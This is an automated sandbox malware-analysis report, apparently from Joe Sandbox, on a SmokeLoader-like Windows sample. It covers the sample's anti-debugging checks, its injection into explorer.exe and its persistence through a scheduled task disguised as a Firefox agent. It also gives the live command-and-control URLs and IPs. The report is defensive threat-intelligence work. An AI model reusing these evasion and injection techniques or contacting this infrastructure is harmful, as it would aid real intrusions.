      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_025F092B mov eax, dword ptr fs:[00000030h]0_2_025F092B
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_025F0D90 mov eax, dword ptr fs:[00000030h]0_2_025F0D90
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeCode function: 0_2_0286F014 push dword ptr fs:[00000030h]0_2_0286F014
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_0271092B mov eax, dword ptr fs:[00000030h]4_2_0271092B
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_02710D90 mov eax, dword ptr fs:[00000030h]4_2_02710D90
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 4_2_0274E9B4 push dword ptr fs:[00000030h]4_2_0274E9B4

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: sfjujsr.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 187.131.253.169 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 78.89.199.216 80Jump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeThread created: C:\Windows\explorer.exe EIP: 13619A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrThread created: unknown EIP: 7DC19A8Jump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\k8JAXb3Lhs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\sfjujsrSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1719118353.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\AppData\Roaming\sfjujsrCode function: 7_2_00406F4A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00406F4A

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote ServicesData from Local System2
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory411
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager12
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS3
      Process Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync13
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523398 Sample: k8JAXb3Lhs.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 23 nwgrus.ru 2->23 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 5 other signatures 2->43 7 k8JAXb3Lhs.exe 2->7         started        10 sfjujsr 2->10         started        12 sfjujsr 2->12         started        signatures3 process4 signatures5 45 Detected unpacking (changes PE section rights) 7->45 47 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->47 49 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->49 57 3 other signatures 7->57 14 explorer.exe 58 3 7->14 injected 51 Antivirus detection for dropped file 10->51 53 Machine Learning detection for dropped file 10->53 55 Maps a DLL or memory area into another process 10->55 process6 dnsIp7 25 nwgrus.ru 78.89.199.216, 49736, 49737, 49738 WATANIYATELECOM-ASKW Kuwait 14->25 27 187.131.253.169, 49772, 49773, 49774 UninetSAdeCVMX Mexico 14->27 19 C:\Users\user\AppData\Roaming\sfjujsr, PE32 14->19 dropped 21 C:\Users\user\...\sfjujsr:Zone.Identifier, ASCII 14->21 dropped 29 System process connects to network (likely due to code injection or exploit) 14->29 31 Benign windows process drops PE files 14->31 33 Deletes itself after installation 14->33 35 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->35 file8 signatures9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      k8JAXb3Lhs.exe100%AviraHEUR/AGEN.1310247
      k8JAXb3Lhs.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\sfjujsr100%AviraHEUR/AGEN.1310247
      C:\Users\user\AppData\Roaming\sfjujsr100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      78.89.199.216
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://unicea.ws/tmp/index.phptrue
          unknown
          http://nwgrus.ru/tmp/index.phptrue
            unknown
            http://tech-servers.in.net/tmp/index.phptrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://excel.office.comexplorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.microexplorer.exe, 00000001.00000000.1720036058.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1720434520.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1721753963.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://api.msn.com/qexplorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1723311543.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1723311543.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1723311543.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                https://word.office.comexplorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1720881139.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://api.msn.com/explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://outlook.com_explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      187.131.253.169
                                                                                      unknownMexico
                                                                                      8151UninetSAdeCVMXtrue
                                                                                      78.89.199.216
                                                                                      nwgrus.ruKuwait
                                                                                      29357WATANIYATELECOM-ASKWtrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1523398
                                                                                      Start date and time:2024-10-01 15:16:06 +02:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 7m 47s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:7
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:k8JAXb3Lhs.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:eead7a529f768cd0a74a639ff806357c.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.evad.winEXE@3/2@6/2
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 92%
                                                                                      • Number of executed functions: 30
                                                                                      • Number of non-executed functions: 9
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 20.190.159.68, 20.190.159.0, 40.126.31.69, 20.190.159.64, 40.126.31.67, 20.190.159.71, 20.190.159.23, 40.126.31.73
                                                                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                      • Execution Graph export aborted for target sfjujsr, PID 3452 because there are no executed function
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • VT rate limit hit for: k8JAXb3Lhs.exe
                                                                                      TimeTypeDescription
                                                                                      09:17:19API Interceptor459412x Sleep call for process: explorer.exe modified
                                                                                      14:17:20Task SchedulerRun new task: Firefox Default Browser Agent F0D68183B38DD430 path: C:\Users\user\AppData\Roaming\sfjujsr
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      78.89.199.216file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • nwgrus.ru/tmp/index.php
                                                                                      kjR9pmEPvT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                      • 100xmargin.com/tmp/index.php
                                                                                      45oPcWSKOp.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                      • mzxn.ru/tmp/index.php
                                                                                      FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                                                      • mzxn.ru/tmp/index.php
                                                                                      TfsbrHNaOX.exeGet hashmaliciousDjvuBrowse
                                                                                      • cajgtus.com/lancer/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                                                                                      Nlwkg1ycJ4.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                      • cajgtus.com/lancer/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
                                                                                      LavMqtzZNw.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                                                      • movlat.com/tmp/
                                                                                      1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                                      • movlat.com/tmp/
                                                                                      OU4gKY1zMo.exeGet hashmaliciousAmadeyBrowse
                                                                                      • jkshb.su/forum/index.php
                                                                                      uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                      • dbfhns.in/tmp/index.php
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      nwgrus.ruOCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 187.228.112.175
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 190.249.193.233
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 210.182.29.70
                                                                                      KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 116.58.10.60
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 190.13.174.94
                                                                                      Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 109.175.29.39
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 185.18.245.58
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 93.118.137.82
                                                                                      OcH6iVxcMe.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 211.181.24.133
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 119.204.11.2
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      UninetSAdeCVMXOCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 187.228.112.175
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elfGet hashmaliciousMiraiBrowse
                                                                                      • 187.223.45.136
                                                                                      file.exeGet hashmaliciousPhorpiexBrowse
                                                                                      • 187.173.216.137
                                                                                      rsJtZBgpwG.elfGet hashmaliciousMiraiBrowse
                                                                                      • 189.181.107.122
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elfGet hashmaliciousUnknownBrowse
                                                                                      • 189.181.178.51
                                                                                      CNpQfI8eIT.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 187.211.53.230
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elfGet hashmaliciousUnknownBrowse
                                                                                      • 187.218.27.151
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elfGet hashmaliciousUnknownBrowse
                                                                                      • 201.109.143.199
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elfGet hashmaliciousUnknownBrowse
                                                                                      • 187.237.52.148
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elfGet hashmaliciousUnknownBrowse
                                                                                      • 187.170.10.121
                                                                                      WATANIYATELECOM-ASKWfile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 78.89.199.216
                                                                                      95.214.27.183-x86-2024-09-02T08_52_28.elfGet hashmaliciousUnknownBrowse
                                                                                      • 188.70.232.225
                                                                                      kjR9pmEPvT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                      • 78.89.199.216
                                                                                      45oPcWSKOp.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                      • 78.89.199.216
                                                                                      FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                                                      • 78.89.199.216
                                                                                      TfsbrHNaOX.exeGet hashmaliciousDjvuBrowse
                                                                                      • 78.89.199.216
                                                                                      Nlwkg1ycJ4.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                      • 78.89.199.216
                                                                                      https://skposta.serv00.net/Get hashmaliciousUnknownBrowse
                                                                                      • 185.146.240.184
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 78.89.199.216
                                                                                      LavMqtzZNw.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                                                      • 78.89.199.216
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\explorer.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):369664
                                                                                      Entropy (8bit):6.992143639446749
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:o1JYtwjCacpD0fbtNorAJoKURDOT42P12YO5LqxuGG8eskEGtwc:Ui2jCacpofbtNRJoSHbkGVGtw
